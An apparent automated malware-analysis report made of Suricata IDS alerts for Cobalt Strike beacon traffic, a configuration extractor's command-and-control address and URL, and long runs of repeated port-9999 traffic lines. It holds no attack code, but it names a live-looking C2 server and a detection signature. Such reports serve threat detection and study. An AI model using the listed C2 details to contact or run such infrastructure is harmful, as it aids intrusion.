Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54408 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54341 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54415 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54454 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54438 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54413 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54402 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54441 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54329 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54445 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54386 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54440 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54435 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54387 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54416 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54432 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54365 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54442 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54446 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54443 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54336 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54436 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54392 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54448 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54352 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54384 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54427 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54419 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54390 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54407 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54421 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54388 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54351 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54393 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54450 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54426 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54412 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54444 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54360 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54434 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54404 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54391 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54449 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54405 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54433 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54410 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54437 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54366 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54447 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54452 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54368 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54451 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54423 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54425 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54455 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54411 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54453 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54439 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54409 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54381 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54394 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54424 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54428 -> 47.239.242.141:9999

Source: Malware configuration extractor	URLs: 47.239.242.141
Source: Malware configuration extractor	URLs: http://47.239.242.141/BQPy

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 57241 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57241
Source: unknown	Network traffic detected: HTTP traffic on port 57242 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57242
Source: unknown	Network traffic detected: HTTP traffic on port 57243 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57243
Source: unknown	Network traffic detected: HTTP traffic on port 57244 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57244
Source: unknown	Network traffic detected: HTTP traffic on port 57245 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57245
Source: unknown	Network traffic detected: HTTP traffic on port 57246 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57246
Source: unknown	Network traffic detected: HTTP traffic on port 57247 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57247
Source: unknown	Network traffic detected: HTTP traffic on port 57248 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57248
Source: unknown	Network traffic detected: HTTP traffic on port 57249 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57249
Source: unknown	Network traffic detected: HTTP traffic on port 57250 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57250
Source: unknown	Network traffic detected: HTTP traffic on port 57251 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57251
Source: unknown	Network traffic detected: HTTP traffic on port 57252 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57252
Source: unknown	Network traffic detected: HTTP traffic on port 57253 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57253
Source: unknown	Network traffic detected: HTTP traffic on port 57254 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57254
Source: unknown	Network traffic detected: HTTP traffic on port 57255 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57255
Source: unknown	Network traffic detected: HTTP traffic on port 57256 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57256
Source: unknown	Network traffic detected: HTTP traffic on port 57257 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57257
Source: unknown	Network traffic detected: HTTP traffic on port 57258 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57258
Source: unknown	Network traffic detected: HTTP traffic on port 57259 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57259
Source: unknown	Network traffic detected: HTTP traffic on port 57260 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57260
Source: unknown	Network traffic detected: HTTP traffic on port 57261 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57261
Source: unknown	Network traffic detected: HTTP traffic on port 57262 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57262
Source: unknown	Network traffic detected: HTTP traffic on port 57263 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57263
Source: unknown	Network traffic detected: HTTP traffic on port 57264 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57264
Source: unknown	Network traffic detected: HTTP traffic on port 57265 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57265
Source: unknown	Network traffic detected: HTTP traffic on port 54000 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54000
Source: unknown	Network traffic detected: HTTP traffic on port 54001 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54001
Source: unknown	Network traffic detected: HTTP traffic on port 54002 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54002
Source: unknown	Network traffic detected: HTTP traffic on port 54003 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54003
Source: unknown	Network traffic detected: HTTP traffic on port 54004 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54004
Source: unknown	Network traffic detected: HTTP traffic on port 54005 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54005
Source: unknown	Network traffic detected: HTTP traffic on port 54006 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54006
Source: unknown	Network traffic detected: HTTP traffic on port 54007 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54007
Source: unknown	Network traffic detected: HTTP traffic on port 54008 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54008
Source: unknown	Network traffic detected: HTTP traffic on port 54009 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54009
Source: unknown	Network traffic detected: HTTP traffic on port 54011 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54011
Source: unknown	Network traffic detected: HTTP traffic on port 54012 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54012
Source: unknown	Network traffic detected: HTTP traffic on port 54022 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54022
Source: unknown	Network traffic detected: HTTP traffic on port 54029 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54029
Source: unknown	Network traffic detected: HTTP traffic on port 54035 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54035
Source: unknown	Network traffic detected: HTTP traffic on port 54046 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54046
Source: unknown	Network traffic detected: HTTP traffic on port 54052 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54052
Source: unknown	Network traffic detected: HTTP traffic on port 54058 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54058
Source: unknown	Network traffic detected: HTTP traffic on port 54067 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54067
Source: unknown	Network traffic detected: HTTP traffic on port 54075 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54075
Source: unknown	Network traffic detected: HTTP traffic on port 54076 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54076
Source: unknown	Network traffic detected: HTTP traffic on port 54087 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54087
Source: unknown	Network traffic detected: HTTP traffic on port 54093 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54093
Source: unknown	Network traffic detected: HTTP traffic on port 54099 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54099
Source: unknown	Network traffic detected: HTTP traffic on port 54110 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54110
Source: unknown	Network traffic detected: HTTP traffic on port 54116 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54116
Source: unknown	Network traffic detected: HTTP traffic on port 54123 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54123
Source: unknown	Network traffic detected: HTTP traffic on port 54132 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54132
Source: unknown	Network traffic detected: HTTP traffic on port 54137 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54137
Source: unknown	Network traffic detected: HTTP traffic on port 54141 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54141
Source: unknown	Network traffic detected: HTTP traffic on port 54147 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54147
Source: unknown	Network traffic detected: HTTP traffic on port 54151 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54151
Source: unknown	Network traffic detected: HTTP traffic on port 54157 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54157
Source: unknown	Network traffic detected: HTTP traffic on port 54167 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54167
Source: unknown	Network traffic detected: HTTP traffic on port 54174 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54174
Source: unknown	Network traffic detected: HTTP traffic on port 54180 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54180
Source: unknown	Network traffic detected: HTTP traffic on port 54190 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54190
Source: unknown	Network traffic detected: HTTP traffic on port 54197 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54197
Source: unknown	Network traffic detected: HTTP traffic on port 54203 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54203
Source: unknown	Network traffic detected: HTTP traffic on port 54209 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54209
Source: unknown	Network traffic detected: HTTP traffic on port 54220 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54220
Source: unknown	Network traffic detected: HTTP traffic on port 54226 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54226
Source: unknown	Network traffic detected: HTTP traffic on port 54235 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54235
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54235
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54235
Source: unknown	Network traffic detected: HTTP traffic on port 54241 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54241
Source: unknown	Network traffic detected: HTTP traffic on port 54249 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54249
Source: unknown	Network traffic detected: HTTP traffic on port 54255 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54255
Source: unknown	Network traffic detected: HTTP traffic on port 54264 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54264
Source: unknown	Network traffic detected: HTTP traffic on port 54271 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54271
Source: unknown	Network traffic detected: HTTP traffic on port 54278 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54278
Source: unknown	Network traffic detected: HTTP traffic on port 54287 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54287
Source: unknown	Network traffic detected: HTTP traffic on port 54295 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54295
Source: unknown	Network traffic detected: HTTP traffic on port 54301 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54301
Source: unknown	Network traffic detected: HTTP traffic on port 54310 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54310
Source: unknown	Network traffic detected: HTTP traffic on port 54318 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54318
Source: unknown	Network traffic detected: HTTP traffic on port 54319 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54319
Source: unknown	Network traffic detected: HTTP traffic on port 54320 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54320
Source: unknown	Network traffic detected: HTTP traffic on port 54321 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54321
Source: unknown	Network traffic detected: HTTP traffic on port 54322 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54322
Source: unknown	Network traffic detected: HTTP traffic on port 54323 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54323
Source: unknown	Network traffic detected: HTTP traffic on port 54324 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54324
Source: unknown	Network traffic detected: HTTP traffic on port 54325 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54325
Source: unknown	Network traffic detected: HTTP traffic on port 54326 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54326
Source: unknown	Network traffic detected: HTTP traffic on port 54327 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54327
Source: unknown	Network traffic detected: HTTP traffic on port 54328 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54328
Source: unknown	Network traffic detected: HTTP traffic on port 54329 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54329
Source: unknown	Network traffic detected: HTTP traffic on port 54330 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54330
Source: unknown	Network traffic detected: HTTP traffic on port 54331 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54331
Source: unknown	Network traffic detected: HTTP traffic on port 54332 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54332
Source: unknown	Network traffic detected: HTTP traffic on port 54333 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54333
Source: unknown	Network traffic detected: HTTP traffic on port 54334 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54334
Source: unknown	Network traffic detected: HTTP traffic on port 54335 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54335
Source: unknown	Network traffic detected: HTTP traffic on port 54336 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54336
Source: unknown	Network traffic detected: HTTP traffic on port 54337 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54337
Source: unknown	Network traffic detected: HTTP traffic on port 54338 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54338
Source: unknown	Network traffic detected: HTTP traffic on port 54339 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54339
Source: unknown	Network traffic detected: HTTP traffic on port 54340 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54340
Source: unknown	Network traffic detected: HTTP traffic on port 54341 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54341
Source: unknown	Network traffic detected: HTTP traffic on port 54342 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54342
Source: unknown	Network traffic detected: HTTP traffic on port 54343 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54343
Source: unknown	Network traffic detected: HTTP traffic on port 54344 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54344
Source: unknown	Network traffic detected: HTTP traffic on port 54345 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54345
Source: unknown	Network traffic detected: HTTP traffic on port 54346 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54346
Source: unknown	Network traffic detected: HTTP traffic on port 54347 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54347
Source: unknown	Network traffic detected: HTTP traffic on port 54348 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54348
Source: unknown	Network traffic detected: HTTP traffic on port 54349 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54349
Source: unknown	Network traffic detected: HTTP traffic on port 54350 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54350
Source: unknown	Network traffic detected: HTTP traffic on port 54351 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54351
Source: unknown	Network traffic detected: HTTP traffic on port 54352 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54352
Source: unknown	Network traffic detected: HTTP traffic on port 54353 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54353
Source: unknown	Network traffic detected: HTTP traffic on port 54354 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54354
Source: unknown	Network traffic detected: HTTP traffic on port 54355 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54355
Source: unknown	Network traffic detected: HTTP traffic on port 54356 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54356
Source: unknown	Network traffic detected: HTTP traffic on port 54357 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54357
Source: unknown	Network traffic detected: HTTP traffic on port 54358 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54358
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54358
Source: unknown	Network traffic detected: HTTP traffic on port 54359 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54359
Source: unknown	Network traffic detected: HTTP traffic on port 54360 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54360
Source: unknown	Network traffic detected: HTTP traffic on port 54361 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54361
Source: unknown	Network traffic detected: HTTP traffic on port 54362 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54362
Source: unknown	Network traffic detected: HTTP traffic on port 54363 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54363
Source: unknown	Network traffic detected: HTTP traffic on port 54364 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54364
Source: unknown	Network traffic detected: HTTP traffic on port 54365 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54365
Source: unknown	Network traffic detected: HTTP traffic on port 54366 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54366
